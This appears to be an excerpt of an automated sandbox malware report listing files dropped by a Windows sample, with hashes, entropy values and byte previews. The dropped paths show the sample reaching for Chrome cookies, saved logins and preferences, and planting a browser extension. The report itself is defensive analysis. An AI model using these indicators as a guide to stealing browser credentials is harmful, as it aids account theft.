                                                                                                                                                  SHA-256:8B6B56F670D59FF93A1C7E601468127FC21F02DDE567B5C21A5D53594CDAEF94
                                                                                                                                                  SHA-512:5FBC72C3FA98DC2B5AD2ED556D2C6DC9279D4BE3EB90FFD7FA2ADA39CB976EBA7CB34033E5786D1CB6137C64C869027002BE2F2CAD408ACEFD5C22006A1FEF34
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: h1GodtbhC8.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: KeJ7Cl7flZ.exe, Detection: malicious, Browse
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d82............!..0.................. ........... ....................... ............@.....................................O.......h...............(...............8............................................ ............... ..H............text........ ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........S..4o..........................................................F......s....(....*..(....*..{....*..{....*..{....*..{....*..(......}......}......}.......}....*6..{....(...+**..{......*6..si........*...0...........(.....~........oj...*&~.......*N(....-.~.....on...*.0..........(....o......r...p(....(....r...po.......o...........%.~.......(..........o....&........o .......u....,.~......o!...on... ...!...~..u....,.~......o!...on... ..."...[..u....,.~......o!...on... ...#
                                                                                                                                                  C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\sib.dat
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1864
                                                                                                                                                  Entropy (8bit):4.120386562888434
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:1AC+F9cbv+WfJBHIxp3Cub2/SG+Degz21A:W3M/xBH+yTSG+S9A
                                                                                                                                                  MD5:F3C315D955C48E6071E1BC1C87C46FD7
                                                                                                                                                  SHA1:82340C833CAC7048E1A58A3EC40EB4540535E2A4
                                                                                                                                                  SHA-256:D09D9E3F16C53ABEB7F25D408F686C708C6240971FC46AF7BF68EC5BD7846724
                                                                                                                                                  SHA-512:7D7C1AF8549E21A045B9983D7B67BBA347823955B829A4ACFB0DD1878DBB34D7EA320B3FA9D7F5FF028E2793B5B852B668BFE4213FFF8678FB87B9F7B4295256
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ...&{.7.C.9.9.9.A.A.A.-.B.9.1.E.-.4.8.7.E.-.9.7.B.D.-.7.6.1.9.B.4.5.5.3.2.F.4.}.....p.3.........................a.d.m.i.n.....0...0...0.............I.:.\.n.e.w._.k.i.l.l.\.p.3.\.e.x.e.....p.3.(.1.)...e.x.e..E.{. "appVersion": "6.0.8",. "arpNoRemove": true,. "arpNoRepair": true,. "arpNoShow": true,. "lang": "en-US",. "productCode": "{7C999AAA-0000-487E-97BD-7619B45532F4}",. "uiScriptTest": false,. "uid": "{FC53B0A8-C9C1-4544-9DD9-C73A991A2A42}",. "upgradeCode": "{9FF45220-3173-4DBF-A859-03B8BC20235F}".}...!%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.S.H.E.L.L.3.2...d.l.l.,........................................................&{.0.0.7.6.C.E.B.B.-.D.4.4.3.-.4.3.C.7.-.9.2.A.5.-.C.4.8.7.F.2.B.5.F.5.4.A.}.........s.e.t.u.p.........I.:.\.n.e.w._.k.i.l.l.\.p.3.\.s.e.t.u.p...e.x.e.................T.e.m.p.\.0.\.s.e.t.u.p...e.x.e.....-.s.........................................]{."ignoreFailure": false,."uiDisabled" : false,."uiHidden" : false,."uiUnSelected" : false
                                                                                                                                                  C:\Users\user\AppData\Local\Cookies1607186571999
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Cookies1607186582639
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Cookies1607186588295
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\background.js
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\book.js
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon.png
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon48.png
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\manifest.json
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.html
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.js
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Login Data1607186571889
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Login Data1607186582639
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Login Data1607186588249
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h1GodtbhC8.exe.log
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):135
                                                                                                                                                  Entropy (8bit):5.045303121991894
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:QHXMKa/xwwUCztJXILKNUhh+9Am12MFuAvOAsDeieVyn:Q3La/xwczfIWW+P12MUAvvrs
                                                                                                                                                  MD5:BB527FDBC763485B0662FCCFD53AA00A
                                                                                                                                                  SHA1:86438ECBAF308B24FA264C7B6ECECDABD1338DC0
                                                                                                                                                  SHA-256:6158C0B5B794617AAD8DA6D671FEF9EDE9CAB2AA9A9FAD91D038739DFF5CEDBD
                                                                                                                                                  SHA-512:2003E36806330552D7DD5E633F24A67F2F4226C12EE43A6F79BB709727DD52910CA5EAF336F9C1E5733C66BC3075CA24CACA19D086BE373B76AA08D3FA818106
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.JScript, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1607186617055
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1607186619758
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  Process:C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):487587840
                                                                                                                                                  Entropy (8bit):0.14148337259986293
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:
                                                                                                                                                  MD5:17DADCF866BF1C23879BECB8AC4386D5
                                                                                                                                                  SHA1:B8B58997D30C327EAB2F75E7903A99DC9156A562
                                                                                                                                                  SHA-256:4CD4B76802D5E8770E1609DD3816FB254B6491A80CB89A6A613320796E023CCE
                                                                                                                                                  SHA-512:2C753F690AB872DDF7D18844B72AF1F9B769E141927C84BD7CF37336FE96E1E004D8518C75335FD526EB5DB44553406D687AE3D6389204C1D0819D86BC0959FB
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview: MZ......................@............................................@.....3.!This program cannot be run in DOS mode....$.......g.&.#aH.#aH.#aH..?L.%aH.N<N. aH.N<I.,aH.#aI..aH..?L.(aH..?.."aH..?J."aH.Rich#aH.........................PE..L....sQY.................v....... .. 9............@.................................Ti....@.............................................0...........l..89..........p...T..............................@............................................text...bt.......v.................. ....rdata..(#.......$...z..............@..@.data...............................@....ndata... ...`...........................rsrc....0.......2..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MSI5715.tmp
                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\atl71.dll
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\download_engine.dll
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
